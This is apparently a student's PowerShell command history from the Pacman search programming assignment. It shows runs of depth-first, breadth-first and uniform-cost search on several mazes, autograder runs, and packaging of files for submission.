 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search'; & 'C:\Python27\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1230869389\pythonFiles\lib\python\debugpy\launcher' '53229' '--' 'C:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search/pacman.py' '-l' 'tinyMaze' '-p' 'SearchAgent' '-a' 'fn=depthFirstSearch' 
python pacman.py -l mediumMaze -p SearchAgent
py -2 pacman.py -l mediumMaze -p SearchAgent
py -2 pacman.py -l tinyMaze -p SearchAgent -a fn=tinyMazeSearch
py -2 pacman.py -l tinyMaze -p SearchAgent -a fn=depthFirstSearch
py -2 pacman.py -l tinyMaze -p SearchAgent -a fn=breadthFirstSearch
py -2 pacman.py -l tinyMaze -p SearchAgent -a fn=depthFirstSearch
py -2 pacman.py -l tinyMaze -p SearchAgent -a fn=breadthFirstSearch
py -2 pacman.py -l tinyMaze -p SearchAgent -a fn=depthFirstSearch
py -2 .\autograder.py
PS C:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search>
py -2 pacman.py -l mediumMaze -p SearchAgent -a fn=depthFirstSearch
py -2 pacman.py -l bigMaze -p SearchAgent -a fn=depthFirstSearch
py -2 pacman.py -l mediumMaze -p SearchAgent -a fn=bfs
py -2 pacman.py -l bigMaze -p SearchAgent -a fn=bfs
py -2 pacman.py -l bigMaze -p SearchAgent -a fn=bfs --frameTime 0
py -2 pacman.py -l mediumMaze -p SearchAgent -a fn=ucs
 & 'C:\Python27\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1230869389\pythonFiles\lib\python\debugpy\launcher' '62222' '--' 'C:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search/pacman.py' '-l' 'mediumMaze' '-p' 'SearchAgent' '-a' 'fn=ucs' 
 & 'C:\Python27\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1230869389\pythonFiles\lib\python\debugpy\launcher' '62222' '--' 'C:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search/pacman.py' '-l' 'mediumMaze' '-p' 'SearchAgent' '-a' 'fn=ucs' c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search'; & 'C:\Python27\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1230869389\pythonFiles\lib\python\debugpy\launcher' '58576' '--' 'C:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search/pacman.py' '-l' 'mediumMaze' '-p' 'SearchAgent' '-a' 'fn=ucs' 
py -2 pacman.py -l mediumMaze -p SearchAgent -a fn=ucs
py -2 .\autograder.py
py -2 .\autograder.py > res
py -2 pacman.py -l mediumMaze -p SearchAgent -a fn=dfs
py -2 pacman.py -l mediumMaze -p SearchAgent -a fn=dfs --frame 0
py -2 pacman.py -l tinyMaze -p SearchAgent -a fn=dfs --frame 0
py -2 pacman.py -l bigMaze -p SearchAgent -a fn=dfs --frame 0
py -2 pacman.py -l bigMaze -p SearchAgent -a fn=ucs --frame 0
py -2 autograder > res
py -2 autograder.py > res
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search'; & 'C:\Python27\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1230869389\pythonFiles\lib\python\debugpy\launcher' '59039' '--' 'C:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search/pacman.py' '-l' 'mediumMaze' '-p' 'SearchAgent' '-a' 'fn=ucs' 
py -2 autograder.py > res
py -2 autograder.py > res.txt
py -2 autograder.py
py -2 autograder.py > res.txt
py -2 autograder.py > tosee.txt
py -2 autograder.py > res.txt
ls
python .\qtable_agent.py
python3 .\qtable_agent.py
py -2 autograder.py
ls
mkdir gwakj-project1
ls
cp .\search.py .\gwakj-project1\
ls
mv .\gwakj-project1\ gwakj-search
ls
cp .\searchAgents.py .\gwakj-search\
ls
cd .\gwakj-search\
ls
cd ..
py -2 .\autograder.py
zip .\gwakj-search\